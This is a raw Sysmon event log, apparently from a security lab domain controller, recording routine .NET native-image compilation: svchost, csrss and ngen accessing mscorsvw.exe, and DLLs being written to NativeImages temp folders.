13:48:02.373{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:02.358{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.358{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:02.217{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\120c-0\System.Web.Extensions.dll2021-01-18 13:48:02.217 10341000x80000000000000007031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:03.826{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.811{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:03.811{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.623{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C902-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.608{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C902-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.608{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C902-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:03.545{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1220-0\System.Web.Entity.dll2021-01-18 13:48:03.545 10341000x80000000000000007024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.280{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.264{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:03.264{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.217{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C702-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.201{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C702-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.201{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C702-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:03.155{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12e0-0\System.Web.DynamicData.Design.dll2021-01-18 13:48:03.155 10341000x80000000000000007017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.076{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.076{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:03.076{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.998{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.998{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:04.951{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6dc-0\System.Web.Extensions.Design.dll2021-01-18 13:48:04.936 10341000x80000000000000007041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.420{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.404{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:04.404{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 